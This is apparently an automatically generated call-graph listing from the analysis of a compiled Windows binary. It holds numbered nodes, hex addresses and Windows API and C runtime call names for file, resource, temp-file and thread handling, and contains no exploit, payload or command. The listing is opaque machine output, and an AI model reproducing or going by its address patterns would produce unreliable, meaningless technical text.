98894->98899 98920 efbfbd Mailbox 98894->98920 98896 efc119 98895->98896 98897 efc0c9 98895->98897 98898 e89997 84 API calls 98896->98898 98896->98920 98979 ee7ba4 59 API calls 98897->98979 98900 efc12b 98898->98900 98959 ee7581 59 API calls Mailbox 98899->98959 98903 e87faf 59 API calls 98900->98903 98906 efc14f CharUpperBuffW 98903->98906 98904 efc0ec 98980 e85ea1 59 API calls Mailbox 98904->98980 98905 efc0a2 98960 e8f5c0 98905->98960 98910 efc169 98906->98910 98909 efc0f4 Mailbox 98981 e8fe40 340 API calls 2 library calls 98909->98981 98911 efc1bc 98910->98911 98912 efc170 98910->98912 98914 e89997 84 API calls 98911->98914 98982 ee7581 59 API calls Mailbox 98912->98982 98915 efc1c4 98914->98915 98983 e89fbd 60 API calls 98915->98983 98918 efc19e 98919 e8f5c0 339 API calls 98918->98919 98919->98920 98920->98798 98921 efc1ce 98921->98920 98922 e89997 84 API calls 98921->98922 98923 efc1e9 98922->98923 98984 e85ea1 59 API calls Mailbox 98923->98984 98925 efc1f9 98985 e8fe40 340 API calls 2 library calls 98925->98985 98927->98823 98928->98823 98929->98843 98930->98838 98931->98826 98932->98829 98933->98798 98934->98798 98935->98798 98936->98843 98937->98813 98938->98834 98939->98834 98940->98834 98941->98819 98942->98812 98943->98819 98944->98880 98946 e87e1f 98945->98946 98947 ebf173 98945->98947 98952 e87db0 98946->98952 98949 e88189 59 API calls 98947->98949 98951 ebf17e __NMSG_WRITE _memmove 98949->98951 98950 e87e2a 98950->98869 98953 e87dbf __NMSG_WRITE 98952->98953 98954 e88189 59 API calls 98953->98954 98955 e87dd0 _memmove 98953->98955 98956 ebf130 _memmove 98954->98956 98955->98950 98957->98920 98958->98892 98959->98905 98961 e8f61a 98960->98961 98962 e8f7b0 98960->98962 98963 ec4848 98961->98963 98964 e8f626 98961->98964 98965 e87f41 59 API calls 98962->98965 98966 efbf80 340 API calls 98963->98966 98986 e8f3f0 98964->98986 98971 e8f6ec Mailbox 98965->98971 98968 ec4856 98966->98968 98972 e8f790 98968->98972 99091 eea0b5 89 API calls 4 library calls 98968->99091 98970 e8f65d 98970->98968 98970->98971 98970->98972 98978 ee3e73 3 API calls 98971->98978 99001 eecde5 98971->99001 99081 e84faa 98971->99081 99087 efe24b 98971->99087 98972->98920 98974 e8f743 98974->98972 99090 e89df0 59 API calls Mailbox 98974->99090 98978->98974 98979->98904 98980->98909 98981->98920 98982->98918 98983->98921 98984->98925 98985->98920 98987 e8f59a 98986->98987 98989 e8f41c 98986->98989 99093 eea0b5 89 API calls 4 library calls 98987->99093 98989->98987 98998 e8f459 _memmove 98989->98998 98990 e8f533 98991 e8f543 98990->98991 99092 efa5ee 85 API calls Mailbox 98990->99092 98991->98970 98993 ea0ff6 59 API calls Mailbox 98993->98998 98994 ec4823 99095 e8f803 340 API calls 98994->99095 98996 e8a000 340 API calls 98996->98998 98997 ec47d3 98997->98970 98998->98990 98998->98993 98998->98994 98998->98996 98998->98997 98999 ec47d5 98998->98999 99094 eea0b5 89 API calls 4 library calls 98999->99094 99002 e877c7 59 API calls 99001->99002 99003 eece1a 99002->99003 99004 e877c7 59 API calls 99003->99004 99005 eece23 99004->99005 99006 eece37 99005->99006 99229 e89c9c 59 API calls 99005->99229 99008 e89997 84 API calls 99006->99008 99009 eece54 99008->99009 99010 eece76 99009->99010 99011 eecf55 99009->99011 99023 eecf85 Mailbox 99009->99023 99012 e89997 84 API calls 99010->99012 99096 e84f3d 99011->99096 99014 eece82 99012->99014 99016 e881a7 59 API calls 99014->99016 99018 eece8e 99016->99018 99017 eecf81 99020 e877c7 59 API calls 99017->99020 99017->99023 99025 eeced4 99018->99025 99026 eecea2 99018->99026 99019 e84f3d 135 API calls 99019->99017 99021 eecfb6 99020->99021 99022 e877c7 59 API calls 99021->99022 99024 eecfbf 99022->99024 99023->98974 99028 e877c7 59 API calls 99024->99028 99027 e89997 84 API calls 99025->99027 99029 e881a7 59 API calls 99026->99029 99030 eecee1 99027->99030 99031 eecfc8 99028->99031 99032 eeceb2 99029->99032 99033 e881a7 59 API calls 99030->99033 99034 e877c7 59 API calls 99031->99034 99035 e87e0b 59 API calls 99032->99035 99036 eeceed 99033->99036 99037 eecfd1 99034->99037 99038 eecebc 99035->99038 99230 ee4cd3 GetFileAttributesW 99036->99230 99040 e89997 84 API calls 99037->99040 99041 e89997 84 API calls 99038->99041 99043 eecfde 99040->99043 99044 eecec8 99041->99044 99042 eecef6 99045 eecf09 99042->99045 99048 e87b52 59 API calls 99042->99048 99046 e846f9 59 API calls 99043->99046 99047 e87c8e 59 API calls 99044->99047 99050 e89997 84 API calls 99045->99050 99055 eecf0f 99045->99055 99049 eecff9 99046->99049 99047->99025 99048->99045 99051 e87b52 59 API calls 99049->99051 99052 eecf36 99050->99052 99054 eed008 99051->99054 99231 ee3a2b 75 API calls Mailbox 99052->99231 99056 eed03c 99054->99056 99058 e87b52 59 API calls 99054->99058 99055->99023 99057 e881a7 59 API calls 99056->99057 99059 eed04a 99057->99059 99060 eed019 99058->99060 99061 e87c8e 59 API calls 99059->99061 99060->99056 99062 e87d2c 59 API calls 99060->99062 99063 eed058 99061->99063 99064 eed02e 99062->99064 99065 e87c8e 59 API calls 99063->99065 99066 e87d2c 59 API calls 99064->99066 99067 eed066 99065->99067 99066->99056 99068 e87c8e 59 API calls 99067->99068 99069 eed074 99068->99069 99070 e89997 84 API calls 99069->99070 99071 eed080 99070->99071 99120 ee42ad 99071->99120 99073 eed091 99074 ee3e73 3 API calls 99073->99074 99075 eed09b 99074->99075 99076 e89997 84 API calls 99075->99076 99080 eed0cc 99075->99080 99077 eed0b9 99076->99077 99174 ee93df 99077->99174 99079 e84faa 84 API calls 99079->99023 99080->99079 99082 e84fbb 99081->99082 99083 e84fb4 99081->99083 99085 e84fca 99082->99085 99086 e84fdb FreeLibrary 99082->99086 99084 ea55d6 __fcloseall 83 API calls 99083->99084 99084->99082 99085->98974 99086->99085 99088 efcdf1 130 API calls 99087->99088 99089 efe25b 99088->99089 99089->98974 99090->98974 99091->98972 99092->98991 99093->98997 99094->98997 99095->98997 99232 e84d13 99096->99232 99101 e84f68 LoadLibraryExW 99242 e84cc8 99101->99242 99102 ebdd0f 99104 e84faa 84 API calls 99102->99104 99106 ebdd16 99104->99106 99108 e84cc8 3 API calls 99106->99108 99110 ebdd1e 99108->99110 99109 e84f8f 99109->99110 99111 e84f9b 99109->99111 99268 e8506b 99110->99268 99113 e84faa 84 API calls 99111->99113 99115 e84fa0 99113->99115 99115->99017 99115->99019 99117 ebdd45 99276 e85027 99117->99276 99121 ee42c9 99120->99121 99122 ee42ce 99121->99122 99123 ee42dc 99121->99123 99124 e881a7 59 API calls 99122->99124 99125 e877c7 59 API calls 99123->99125 99126 ee42d7 Mailbox 99124->99126 99127 ee42e4 99125->99127 99126->99073 99128 e877c7 59 API calls 99127->99128 99129 ee42ec 99128->99129 99130 e877c7 59 API calls 99129->99130 99131 ee42f7 99130->99131 99132 e877c7 59 API calls 99131->99132 99133 ee42ff 99132->99133 99134 e877c7 59 API calls 99133->99134 99135 ee4307 99134->99135 99136 e877c7 59 API calls 99135->99136 99137 ee430f 99136->99137 99138 e877c7 59 API calls 99137->99138 99139 ee4317 99138->99139 99140 e877c7 59 API calls 99139->99140 99141 ee431f 99140->99141 99142 e846f9 59 API calls 99141->99142 99143 ee4336 99142->99143 99144 e846f9 59 API calls 99143->99144 99145 ee434f 99144->99145 99146 e87b52 59 API calls 99145->99146 99147 ee435b 99146->99147 99148 ee436e 99147->99148 99149 e87e8c 59 API calls 99147->99149 99150 e87b52 59 API calls 99148->99150 99149->99148 99151 ee4377 99150->99151 99152 ee4387 99151->99152 99153 e87e8c 59 API calls 99151->99153 99154 e881a7 59 API calls 99152->99154 99153->99152 99155 ee4393 99154->99155 99156 e87c8e 59 API calls 99155->99156 99157 ee439f 99156->99157 99703 ee445f 59 API calls 99157->99703 99159 ee43ae 99704 ee445f 59 API calls 99159->99704 99161 ee43c1 99162 e87b52 59 API calls 99161->99162 99163 ee43cb 99162->99163 99164 ee43e2 99163->99164 99165 ee43d0 99163->99165 99166 e87b52 59 API calls 99164->99166 99167 e87e0b 59 API calls 99165->99167 99168 ee43eb 99166->99168 99169 ee43dd 99167->99169 99170 ee4409 99168->99170 99171 e87e0b 59 API calls 99168->99171 99172 e87c8e 59 API calls 99169->99172 99173 e87c8e 59 API calls 99170->99173 99171->99169 99172->99170 99173->99126 99175 ee93ec __write_nolock 99174->99175 99176 ea0ff6 Mailbox 59 API calls 99175->99176 99177 ee9449 99176->99177 99178 e8538e 59 API calls 99177->99178 99179 ee9453 99178->99179 99180 ee91e9 GetSystemTimeAsFileTime 99179->99180 99181 ee945e 99180->99181 99182 e85045 85 API calls 99181->99182 99183 ee9471 _wcscmp 99182->99183 99184 ee9495 99183->99184 99185 ee9542 99183->99185 99735 ee99be 99184->99735 99187 ee99be 96 API calls 99185->99187 99202 ee950e _wcscat 99187->99202 99190 e8506b 74 API calls 99192 ee9567 99190->99192 99191 ee954b 99191->99080 99193 e8506b 74 API calls 99192->99193 99195 ee9577 99193->99195 99194 ee94c3 _wcscat _wcscpy 99742 ea432e 58 API calls __wsplitpath_helper 99194->99742 99196 e8506b 74 API calls 99195->99196 99198 ee9592 99196->99198 99199 e8506b 74 API calls 99198->99199 99200 ee95a2 99199->99200 99201 e8506b 74 API calls 99200->99201 99203 ee95bd 99201->99203 99202->99190 99202->99191 99204 e8506b 74 API calls 99203->99204 99205 ee95cd 99204->99205 99206 e8506b 74 API calls 99205->99206 99207 ee95dd 99206->99207 99208 e8506b 74 API calls 99207->99208 99209 ee95ed 99208->99209 99705 ee9b6d GetTempPathW GetTempFileNameW 99209->99705 99211 ee95f9 99212 ea548b 115 API calls 99211->99212 99214 ee960a 99212->99214 99214->99191 99216 e8506b 74 API calls 99214->99216 99227 ee96c4 99214->99227 99706 ea4a93 99214->99706 99215 ee96cf 99217 ee96e9 99215->99217 99218 ee96d5 DeleteFileW 99215->99218 99216->99214 99219 ee978f CopyFileW 99217->99219 99222 ee96f3 _wcsncpy 99217->99222 99218->99191 99719 ea55d6 99227->99719 99229->99006 99230->99042 99231->99055 99281 e84d61 99232->99281 99235 e84d3a 99237 e84d4a FreeLibrary 99235->99237 99238 e84d53 99235->99238 99236 e84d61 2 API calls 99236->99235 99237->99238 99239 ea548b 99238->99239 99285 ea54a0 99239->99285 99241 e84f5c 99241->99101 99241->99102 99442 e84d94 99242->99442 99245 e84ced 99247 e84d08 99245->99247 99248 e84cff FreeLibrary 99245->99248 99246 e84d94 2 API calls 99246->99245 99249 e84dd0 99247->99249 99248->99247 99250 ea0ff6 Mailbox 59 API calls 99249->99250 99251 e84de5 99250->99251 99252 e8538e 59 API calls 99251->99252 99253 e84df1 _memmove 99252->99253 99254 e84e2c 99253->99254 99256 e84ee9 99253->99256 99257 e84f21 99253->99257 99255 e85027 69 API calls 99254->99255 99263 e84e35 99255->99263 99446 e84fe9 99256->99446 99458 ee9ba5 95 API calls 99257->99458 99260 e8506b 74 API calls 99260->99263 99262 e84ec9 99262->99109 99263->99260 99263->99262 99264 ebdcd0 99263->99264 99453 e85045 99263->99453 99265 e85045 85 API calls 99264->99265 99266 ebdce4 99265->99266 99267 e8506b 74 API calls 99266->99267 99267->99262 99269 e8507d 99268->99269 99270 ebddf6 99268->99270 99482 ea5812 99269->99482 99273 ee9393 99680 ee91e9 99273->99680 99275 ee93a9 99275->99117 99277 e85036 99276->99277 99279 ebddb9 99276->99279 99685 ea5e90 99277->99685 99280 e8503e 99282 e84d2e 99281->99282 99283 e84d6a LoadLibraryA 99281->99283 99282->99235 99282->99236 99283->99282 99284 e84d7b GetProcAddress 99283->99284 99284->99282 99286 ea54ac _raise 99285->99286 99287 ea54bf 99286->99287 99290 ea54f0 99286->99290 99334 ea8d68 58 API calls __getptd_noexit 99287->99334 99289 ea54c4 99335 ea8ff6 9 API calls __wctomb_s_l 99289->99335 99304 eb0738 99290->99304 99293 ea54f5 99294 ea550b 99293->99294 99295 ea54fe 99293->99295 99296 ea5535 99294->99296 99297 ea5515 99294->99297 99336 ea8d68 58 API calls __getptd_noexit 99295->99336 99319 eb0857 99296->99319 99337 ea8d68 58 API calls __getptd_noexit 99297->99337 99301 ea54cf _raise @_EH4_CallFilterFunc@8 99301->99241 99305 eb0744 _raise 99304->99305 99306 ea9e4b __lock 58 API calls 99305->99306 99317 eb0752 99306->99317 99307 eb07c6 99339 eb084e 99307->99339 99308 eb07cd 99344 ea8a5d 58 API calls 2 library calls 99308->99344 99311 eb07d4 99311->99307 99345 eaa06b InitializeCriticalSectionAndSpinCount 99311->99345 99312 eb0843 _raise 99312->99293 99314 ea9ed3 __mtinitlocknum 58 API calls 99314->99317 99316 eb07fa RtlEnterCriticalSection 99316->99307 99317->99307 99317->99308 99317->99314 99342 ea6e8d 59 API calls __lock 99317->99342 99343 ea6ef7 RtlLeaveCriticalSection RtlLeaveCriticalSection _doexit 99317->99343 99320 eb0877 __wopenfile 99319->99320 99321 eb0891 99320->99321 99333 eb0a4c 99320->99333 99352 ea3a0b 60 API calls 2 library calls 99320->99352 99350 ea8d68 58 API calls __getptd_noexit 99321->99350 99323 eb0896 99351 ea8ff6 9 API calls __wctomb_s_l 99323->99351 99325 ea5540 99338 ea5562 RtlLeaveCriticalSection RtlLeaveCriticalSection __wfsopen 99325->99338 99326 eb0aaf 99347 eb87f1 99326->99347 99329 eb0a45 99329->99333 99353 ea3a0b 60 API calls 2 library calls 99329->99353 99331 eb0a64 99331->99333 99354 ea3a0b 60 API calls 2 library calls 99331->99354 99333->99321 99333->99326 99334->99289 99335->99301 99336->99301 99337->99301 99338->99301 99346 ea9fb5 RtlLeaveCriticalSection 99339->99346 99341 eb0855 99341->99312 99342->99317 99343->99317 99344->99311 99345->99316 99346->99341 99355 eb7fd5 99347->99355 99349 eb880a 99349->99325 99350->99323 99351->99325 99352->99329 99353->99331 99354->99333 99356 eb7fe1 _raise 99355->99356 99357 eb7ff7 99356->99357 99359 eb802d 99356->99359 99439 ea8d68 58 API calls __getptd_noexit 99357->99439 99366 eb809e 99359->99366 99360 eb7ffc 99440 ea8ff6 9 API calls __wctomb_s_l 99360->99440 99363 eb8049 99441 eb8072 RtlLeaveCriticalSection __unlock_fhandle 99363->99441 99364 eb8006 _raise 99364->99349 99367 eb80be 99366->99367 99368 ea471a __wsopen_nolock 58 API calls 99367->99368 99371 eb80da 99368->99371 99369 ea9006 __invoke_watson 8 API calls 99370 eb87f0 99369->99370 99373 eb7fd5 __wsopen_helper 103 API calls 99370->99373 99372 eb8114 99371->99372 99379 eb8137 99371->99379 99389 eb8211 99371->99389 99374 ea8d34 __write 58 API calls 99372->99374 99375 eb880a 99373->99375 99376 eb8119 99374->99376 99375->99363 99377 ea8d68 __wctomb_s_l 58 API calls 99376->99377 99378 eb8126 99377->99378 99381 ea8ff6 __wctomb_s_l 9 API calls 99378->99381 99380 eb81f5 99379->99380 99388 eb81d3 99379->99388 99382 ea8d34 __write 58 API calls 99380->99382 99383 eb8130 99381->99383 99384 eb81fa 99382->99384 99383->99363 99385 ea8d68 __wctomb_s_l 58 API calls 99384->99385 99386 eb8207 99385->99386 99387 ea8ff6 __wctomb_s_l 9 API calls 99386->99387 99387->99389 99390 ead4d4 __alloc_osfhnd 61 API calls 99388->99390 99389->99369 99391 eb82a1 99390->99391 99392 eb82ab 99391->99392 99393 eb82ce 99391->99393 99395 ea8d34 __write 58 API calls 99392->99395 99394 eb7f4d ___createFile GetModuleHandleW GetProcAddress CreateFileW 99393->99394 99403 eb82f0 99394->99403 99396 eb82b0 99395->99396 99398 ea8d68 __wctomb_s_l 58 API calls 99396->99398 99397 eb836e GetFileType 99401 eb83bb 99397->99401 99402 eb8379 GetLastError 99397->99402 99400 eb82ba 99398->99400 99399 eb833c GetLastError 99404 ea8d47 __dosmaperr 58 API calls 99399->99404 99405 ea8d68 __wctomb_s_l 58 API calls 99400->99405 99412 ead76a __set_osfhnd 59 API calls 99401->99412 99406 ea8d47 __dosmaperr 58 API calls 99402->99406 99403->99397 99403->99399 99408 eb7f4d ___createFile GetModuleHandleW GetProcAddress CreateFileW 99403->99408 99409 eb8361 99404->99409 99405->99383 99407 eb83a0 CloseHandle 99406->99407 99407->99409 99410 eb83ae 99407->99410 99411 eb8331 99408->99411 99414 ea8d68 __wctomb_s_l 58 API calls 99409->99414 99413 ea8d68 __wctomb_s_l 58 API calls 99410->99413 99411->99397 99411->99399 99417 eb83d9 99412->99417 99415 eb83b3 99413->99415 99414->99389 99415->99409 99416 eb8594 99416->99389 99419 eb8767 CloseHandle 99416->99419 99417->99416 99418 eb1b11 __lseeki64_nolock 60 API calls 99417->99418 99434 eb845a 99417->99434 99420 eb8443 99418->99420 99421 eb7f4d ___createFile GetModuleHandleW GetProcAddress CreateFileW 99419->99421 99422 ea8d34 __write 58 API calls 99420->99422 99420->99434 99423 eb878e 99421->99423 99422->99434 99424 eb87c2 99423->99424 99425 eb8796 GetLastError 99423->99425 99424->99389 99426 ea8d47 __dosmaperr 58 API calls 99425->99426 99427 eb87a2 99426->99427 99430 ead67d __free_osfhnd 59 API calls 99427->99430 99428 eb0d2d __close_nolock 61 API calls 99428->99434 99429 eb10ab 70 API calls __read_nolock 99429->99434 99430->99424 99431 eb99f2 __chsize_nolock 82 API calls 99431->99434 99432 eadac6 __write 78 API calls 99432->99434 99433 eb8611 99435 eb0d2d __close_nolock 61 API calls 99433->99435 99434->99416 99434->99428 99434->99429 99434->99431 99434->99432 99434->99433 99437 eb1b11 60 API calls __lseeki64_nolock 99434->99437 99436 eb8618 99435->99436 99438 ea8d68 __wctomb_s_l 58 API calls 99436->99438 99437->99434 99438->99389 99439->99360 99440->99364 99441->99364 99443 e84ce1 99442->99443 99444 e84d9d LoadLibraryA 99442->99444 99443->99245 99443->99246 99444->99443 99445 e84dae GetProcAddress 99444->99445 99445->99443 99447 e84fff 99446->99447 99448 e85003 FindResourceExW 99447->99448 99450 e85020 99447->99450 99449 ebdd5c LoadResource 99448->99449 99448->99450 99449->99450 99451 ebdd71 SizeofResource 99449->99451 99450->99254 99451->99450 99452 ebdd85 LockResource 99451->99452 99452->99450 99454 e85054 99453->99454 99457 ebddd4 99453->99457 99459 ea5a7d 99454->99459 99456 e85062 99456->99263 99458->99254 99460 ea5a89 _raise 99459->99460 99461 ea5a9b 99460->99461 99463 ea5ac1 99460->99463 99472 ea8d68 58 API calls __getptd_noexit 99461->99472 99474 ea6e4e 99463->99474 99464 ea5aa0 99473 ea8ff6 9 API calls __wctomb_s_l 99464->99473 99469 ea5ad6 99481 ea5af8 RtlLeaveCriticalSection RtlLeaveCriticalSection __wfsopen 99469->99481 99471 ea5aab _raise 99471->99456 99472->99464 99473->99471 99475 ea6e5e 99474->99475 99476 ea6e80 RtlEnterCriticalSection 99474->99476 99475->99476 99477 ea6e66 99475->99477 99478 ea5ac7 99476->99478 99479 ea9e4b __lock 58 API calls 99477->99479 99480 ea59ee 83 API calls 5 library calls 99478->99480 99479->99478 99480->99469 99481->99471 99485 ea582d 99482->99485 99484 e8508e 99484->99273 99487 ea5839 _raise 99485->99487 99486 ea5874 _raise 99486->99484 99487->99486 99488 ea584f _memset 99487->99488 99489 ea587c 99487->99489 99512 ea8d68 58 API calls __getptd_noexit 99488->99512 99490 ea6e4e __lock_file 59 API calls 99489->99490 99491 ea5882 99490->99491 99498 ea564d 99491->99498 99493 ea5869 99513 ea8ff6 9 API calls __wctomb_s_l 99493->99513 99499 ea5683 99498->99499 99501 ea5668 _memset 99498->99501 99514 ea58b6 RtlLeaveCriticalSection RtlLeaveCriticalSection __wfsopen 99499->99514 99500 ea5673 99610 ea8d68 58 API calls __getptd_noexit 99500->99610 99501->99499 99501->99500 99509 ea56c3 99501->99509 99503 ea5678 99611 ea8ff6 9 API calls __wctomb_s_l 99503->99611 99506 ea57d4 _memset 99613 ea8d68 58 API calls __getptd_noexit 99506->99613 99509->99499 99509->99506 99515 ea4916 99509->99515 99522 eb10ab 99509->99522 99590 eb0df7 99509->99590 99612 eb0f18 58 API calls 3 library calls 99509->99612 99512->99493 99513->99486 99514->99486 99516 ea4920 99515->99516 99517 ea4935 99515->99517 99614 ea8d68 58 API calls __getptd_noexit 99516->99614 99517->99509 99519 ea4925 99615 ea8ff6 9 API calls __wctomb_s_l 99519->99615 99521 ea4930 99521->99509 99523 eb10cc 99522->99523 99524 eb10e3 99522->99524 99625 ea8d34 58 API calls __getptd_noexit 99523->99625 99526 eb181b 99524->99526 99529 eb111d 99524->99529 99641 ea8d34 58 API calls __getptd_noexit 99526->99641 99528 eb10d1 99626 ea8d68 58 API calls __getptd_noexit 99528->99626 99532 eb1125 99529->99532 99538 eb113c 99529->99538 99530 eb1820 99642 ea8d68 58 API calls __getptd_noexit 99530->99642 99627 ea8d34 58 API calls __getptd_noexit 99532->99627 99535 eb1131 99643 ea8ff6 9 API calls __wctomb_s_l 99535->99643 99536 eb112a 99628 ea8d68 58 API calls __getptd_noexit 99536->99628 99539 eb1151 99538->99539 99542 eb116b 99538->99542 99543 eb1189 99538->99543 99570 eb10d8 99538->99570 99629 ea8d34 58 API calls __getptd_noexit 99539->99629 99542->99539 99545 eb1176 99542->99545 99630 ea8a5d 58 API calls 2 library calls 99543->99630 99616 eb5ebb 99545->99616 99546 eb1199 99548 eb11bc 99546->99548 99549 eb11a1 99546->99549 99633 eb1b11 60 API calls 3 library calls 99548->99633 99631 ea8d68 58 API calls __getptd_noexit 99549->99631 99550 eb128a 99552 eb1303 ReadFile 99550->99552 99557 eb12a0 GetConsoleMode 99550->99557 99555 eb17e3 GetLastError 99552->99555 99556 eb1325 99552->99556 99554 eb11a6 99632 ea8d34 58 API calls __getptd_noexit 99554->99632 99559 eb17f0 99555->99559 99560 eb12e3 99555->99560 99556->99555 99565 eb12f5 99556->99565 99561 eb1300 99557->99561 99562 eb12b4 99557->99562 99639 ea8d68 58 API calls __getptd_noexit 99559->99639 99573 eb12e9 99560->99573 99634 ea8d47 58 API calls 3 library calls 99560->99634 99561->99552 99562->99561 99563 eb12ba ReadConsoleW 99562->99563 99563->99565 99566 eb12dd GetLastError 99563->99566 99565->99573 99575 eb135a 99565->99575 99580 eb15c7 99565->99580 99566->99560 99568 eb17f5 99640 ea8d34 58 API calls __getptd_noexit 99568->99640 99570->99509 99571 ea2f95 _free 58 API calls 99571->99570 99572 eb1447 99572->99573 99578 eb14f4 99572->99578 99583 eb1504 99572->99583 99586 eb14b4 MultiByteToWideChar 99572->99586 99573->99570 99573->99571 99575->99572 99576 eb13c6 ReadFile 99575->99576 99577 eb13e7 GetLastError 99576->99577 99588 eb13f1 99576->99588 99577->99588 99636 ea8d68 58 API calls __getptd_noexit 99578->99636 99579 eb16cd ReadFile 99581 eb16f0 GetLastError 99579->99581 99589 eb16fe 99579->99589 99580->99573 99580->99579 99581->99589 99583->99586 99637 eb1b11 60 API calls 3 library calls 99583->99637 99586->99566 99586->99573 99588->99575 99635 eb1b11 60 API calls 3 library calls 99588->99635 99589->99580 99638 eb1b11 60 API calls 3 library calls 99589->99638 99591 eb0e02 99590->99591 99595 eb0e17 99590->99595 99677 ea8d68 58 API calls __getptd_noexit 99591->99677 99593 eb0e07 99678 ea8ff6 9 API calls __wctomb_s_l 99593->99678 99596 eb0e4c 99595->99596 99601 eb0e12 99595->99601 99679 eb6234 58 API calls __malloc_crt 99595->99679 99598 ea4916 __fclose_nolock 58 API calls 99596->99598 99599 eb0e60 99598->99599 99644 eb0f97 99599->99644 99601->99509 99602 eb0e67 99602->99601 99603 ea4916 __fclose_nolock 58 API calls 99602->99603 99604 eb0e8a 99603->99604 99604->99601 99605 ea4916 __fclose_nolock 58 API calls 99604->99605 99606 eb0e96 99605->99606 99606->99601 99607 ea4916 __fclose_nolock 58 API calls 99606->99607 99608 eb0ea3 99607->99608 99609 ea4916 __fclose_nolock 58 API calls 99608->99609 99609->99601 99610->99503 99611->99499 99612->99509 99613->99503 99614->99519 99615->99521 99617 eb5ed3 99616->99617 99618 eb5ec6 99616->99618 99621 eb5edf 99617->99621 99622 ea8d68 __wctomb_s_l 58 API calls 99617->99622 99619 ea8d68 __wctomb_s_l 58 API calls 99618->99619 99620 eb5ecb 99619->99620 99620->99550 99621->99550 99623 eb5f00 99622->99623 99624 ea8ff6 __wctomb_s_l 9 API calls 99623->99624 99624->99620 99625->99528 99626->99570 99627->99536 99628->99535 99629->99536 99630->99546 99631->99554 99632->99570 99633->99545 99634->99573 99635->99588 99636->99573 99637->99586 99638->99589 99639->99568 99640->99573 99641->99530 99642->99535 99643->99570 99645 eb0fa3 _raise 99644->99645 99646 eb0fb0 99645->99646 99647 eb0fc7 99645->99647 99649 ea8d34 __write 58 API calls 99646->99649 99648 eb108b 99647->99648 99651 eb0fdb 99647->99651 99652 ea8d34 __write 58 API calls 99648->99652 99650 eb0fb5 99649->99650 99653 ea8d68 __wctomb_s_l 58 API calls 99650->99653 99654 eb0ff9 99651->99654 99655 eb1006 99651->99655 99656 eb0ffe 99652->99656 99657 eb0fbc _raise 99653->99657 99658 ea8d34 __write 58 API calls 99654->99658 99659 eb1028 99655->99659 99660 eb1013 99655->99660 99662 ea8d68 __wctomb_s_l 58 API calls 99656->99662 99657->99602 99658->99656 99661 ead446 ___lock_fhandle 59 API calls 99659->99661 99663 ea8d34 __write 58 API calls 99660->99663 99664 eb102e 99661->99664 99672 eb1020 99662->99672 99665 eb1018 99663->99665 99666 eb1041 99664->99666 99667 eb1054 99664->99667 99668 ea8d68 __wctomb_s_l 58 API calls 99665->99668 99669 eb10ab __read_nolock 70 API calls 99666->99669 99671 ea8d68 __wctomb_s_l 58 API calls 99667->99671 99668->99672 99673 eb104d 99669->99673 99670 ea8ff6 __wctomb_s_l 9 API calls 99670->99657 99674 eb1059 99671->99674 99672->99670 99676 eb1083 __read RtlLeaveCriticalSection 99673->99676 99675 ea8d34 __write 58 API calls 99674->99675 99675->99673 99676->99657 99677->99593 99678->99601 99679->99596 99683 ea543a GetSystemTimeAsFileTime 99680->99683 99682 ee91f8 99682->99275 99684 ea5468 __aulldiv 99683->99684 99684->99682 99686 ea5e9c _raise 99685->99686 99687 ea5eae 99686->99687 99688 ea5ec3 99686->99688 99699 ea8d68 58 API calls __getptd_noexit 99687->99699 99689 ea6e4e __lock_file 59 API calls 99688->99689 99691 ea5ec9 99689->99691 99701 ea5b00 67 API calls 6 library calls 99691->99701 99692 ea5eb3 99700 ea8ff6 9 API calls __wctomb_s_l 99692->99700 99695 ea5ed4 99702 ea5ef4 RtlLeaveCriticalSection RtlLeaveCriticalSection __wfsopen 99695->99702 99697 ea5ee6 99698 ea5ebe _raise 99697->99698 99698->99280 99699->99692 99700->99698 99701->99695 99702->99697 99703->99159 99704->99161 99705->99211 99707 ea4a9f _raise 99706->99707 99708 ea4abd 99707->99708 99709 ea4ad5 99707->99709 99710 ea4acd _raise 99707->99710 99786 ea8d68 58 API calls __getptd_noexit 99708->99786 99711 ea6e4e __lock_file 59 API calls 99709->99711 99710->99214 99713 ea4adb 99711->99713 99774 ea493a 99713->99774 99714 ea4ac2 99787 ea8ff6 9 API calls __wctomb_s_l 99714->99787 99720 ea55e2 _raise 99719->99720 99721 ea560e 99720->99721 99722 ea55f6 99720->99722 99725 ea6e4e __lock_file 59 API calls 99721->99725 99729 ea5606 _raise 99721->99729 99948 ea8d68 58 API calls __getptd_noexit 99722->99948 99724 ea55fb 99949 ea8ff6 9 API calls __wctomb_s_l 99724->99949 99726 ea5620 99725->99726 99932 ea556a 99726->99932 99729->99215 99738 ee99d2 __tzset_nolock _wcscmp 99735->99738 99736 ee9393 GetSystemTimeAsFileTime 99736->99738 99737 ee949a 99737->99191 99741 ea432e 58 API calls __wsplitpath_helper 99737->99741 99738->99736 99738->99737 99739 e8506b 74 API calls 99738->99739 99740 e85045 85 API calls 99738->99740 99739->99738 99740->99738 99741->99194 99742->99202 99777 ea4949 99774->99777 99780 ea4967 99774->99780 99777->99780 99786->99714 99787->99710 99948->99724 99949->99729 100061 e81066 100066 e8f8cf 100061->100066 100063 e8106c 100064 ea2f80 __cinit 67 API calls 100063->100064 100065 e81076 100064->100065 100067 e8f8f0 100066->100067 100099 ea0143 100067->100099 100071 e8f937 100072 e877c7 59 API calls 100071->100072 100073 e8f941 100072->100073 100074 e877c7 59 API calls 100073->100074 100075 e8f94b 100074->100075 100076 e877c7 59 API calls 100075->100076 100077 e8f955 100076->100077 100078 e877c7 59 API calls 100077->100078 100079 e8f993 100078->100079 100080 e877c7 59 API calls 100079->100080 100081 e8fa5e 100080->100081 100109 e960e7 100081->100109 100085 e8fa90 100086 e877c7 59 API calls 100085->100086 100087 e8fa9a 100086->100087 100137 e9ffde 100087->100137 100089 e8fae1 100090 e8faf1 GetStdHandle 100089->100090 100091 e8fb3d 100090->100091 100092 ec49d5 100090->100092 100093 e8fb45 OleInitialize 100091->100093 100092->100091 100094 ec49de 100092->100094 100093->100063 100144 ee6dda 64 API calls Mailbox 100094->100144 100096 ec49e5 100145 ee74a9 CreateThread 100096->100145 100098 ec49f1 CloseHandle 100098->100093 100146 ea021c 100099->100146 100102 ea021c 59 API calls 100103 ea0185 100102->100103 100104 e877c7 59 API calls 100103->100104 100105 ea0191 100104->100105 100106 e87d2c 59 API calls 100105->100106 100107 e8f8f6 100106->100107 100108 ea03a2 6 API calls 100107->100108 100108->100071 100110 e877c7 59 API calls 100109->100110 100111 e960f7 100110->100111 100112 e877c7 59 API calls 100111->100112 100113 e960ff 100112->100113 100153 e95bfd 100113->100153 100116 e95bfd 59 API calls 100117 e9610f 100116->100117 100118 e877c7 59 API calls 100117->100118 100119 e9611a 